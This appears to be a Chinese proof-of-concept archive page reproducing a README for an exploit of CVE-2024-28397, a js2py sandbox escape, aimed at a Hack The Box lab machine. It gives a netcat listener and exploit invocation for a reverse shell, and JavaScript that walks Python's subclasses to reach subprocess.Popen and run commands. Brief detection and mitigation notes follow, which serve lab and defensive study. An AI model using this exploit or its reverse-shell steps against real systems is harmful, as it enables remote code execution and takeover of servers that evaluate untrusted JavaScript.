关联漏洞
标题:
Js2Py 安全漏洞
(CVE-2024-28397)
描述:Js2Py是Python基金会的一个库。用于将 JavaScript 转换为 Python 代码。 Js2Py 0.74 及之前版本存在安全漏洞,该漏洞源于组件 js2py.disable_pyimport() 中存在一个问题,攻击者利用该漏洞可以通过精心设计的 API 调用执行任意代码。
描述
This repository contains a python exploit code for CVE-2024-28397 intended for use on the "CodePartTwo" machine on Hack The Box (HTB).
介绍
# CVE-2024-28397 js2py Sandbox Escape Exploit - (CodePartTwo - HTB)
A Python exploit code for **CVE-2024-28397**, a critical vulnerability in js2py <= 0.74 that allows sandbox escape and remote code execution.
## 🚨 Vulnerability Details
- **CVE ID**: CVE-2024-28397
- **Affected Software**: js2py <= 0.74
- **Severity**: Critical (CVSS 9.8)
- **Type**: Sandbox Escape / Remote Code Execution
- **Discovery Date**: February 2024
### Description
js2py is a popular Python library for evaluating JavaScript code within Python environments. This vulnerability allows attackers to escape the js2py sandbox environment and execute arbitrary Python/system commands, even when `js2py.disable_pyimport()` is enabled.
The exploit leverages Python's object introspection capabilities through JavaScript to access the `subprocess.Popen` class and execute system commands.
## 🎯 Affected Applications
- Web applications using js2py for JavaScript evaluation
- Code execution platforms (like online code editors)
- Web scrapers that parse JavaScript
- Any application that processes untrusted JavaScript via js2py
## 🚀 Usage
### Prerequisites
```bash
pip install requests
```
### Basic Usage
```bash
# Start netcat listener
nc -lnvp 4444
# Run exploit
python3 exploit.py --target http://target.com:8000/run_code --lhost 10.10.14.100 --lport 4444
```
### Command Line Options
```
--target Target URL endpoint (required)
--lhost Local IP for reverse shell (required)
--lport Local port for reverse shell (default: 4444)
```
### Example
```bash
python3 exploit.py --target http://10.10.11.82:8000/run_code --lhost 10.10.14.100
```
## 🔧 How It Works
1. **Payload Generation**: Creates a base64-encoded reverse shell command
2. **Sandbox Escape**: Uses JavaScript to access Python's object hierarchy via `__class__` and `__base__`
3. **Process Execution**: Locates `subprocess.Popen` through introspection
4. **Command Execution**: Executes the reverse shell command using Popen
5. **Shell Establishment**: Connects back to the attacker's machine
### Technical Details
The exploit works by:
- Accessing `Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__`
- Walking through Python's object hierarchy using `__subclasses__()`
- Finding the `subprocess.Popen` class
- Creating a new process to execute the reverse shell
## 📝 Exploit Code Structure
```javascript
// Access Python object hierarchy
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__;
let obj = a(a(a, "__class__"), "__base__");
// Find subprocess.Popen class
function findpopen(o) {
// Recursive search through subclasses
for(let i in o.__subclasses__()) {
let item = o.__subclasses__()[i];
if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
return item;
}
}
}
// Execute command
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate();
```
## 🛡️ Detection
Look for JavaScript code containing:
- `__class__` or `___class___` attribute access
- `__subclasses__()` method calls
- References to `subprocess` or `Popen`
- Base64 encoded payloads with `printf` and `base64 -d`
## 🔒 Mitigation
1. **Update js2py**: Upgrade to a patched version (> 0.74)
2. **Input Validation**: Sanitize JavaScript code before execution
3. **Sandboxing**: Use additional containerization (Docker, chroot)
4. **Code Review**: Audit JavaScript execution contexts
5. **WAF Rules**: Block suspicious JavaScript patterns
## ⚠️ Legal Disclaimer
This tool is for **authorized penetration testing and educational purposes only**. Users are responsible for complying with applicable laws and regulations. Unauthorized access to computer systems is illegal.
## 📚 References
- [Original CVE Report](https://huntr.com/bounties/1b4f8f38-39da-44b6-9f98-f618639d0dd7)
- [js2py GitHub Repository](https://github.com/PiotrDabkowski/Js2Py)
- [CVE-2024-28397 Details](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28397)
## 📄 License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
文件快照
[4.0K] /data/pocs/9c63e9cf6f959a302ee72d2a4adeacec48859c89
├── [4.6K] exploit.py
├── [1.0K] LICENSE
└── [4.1K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。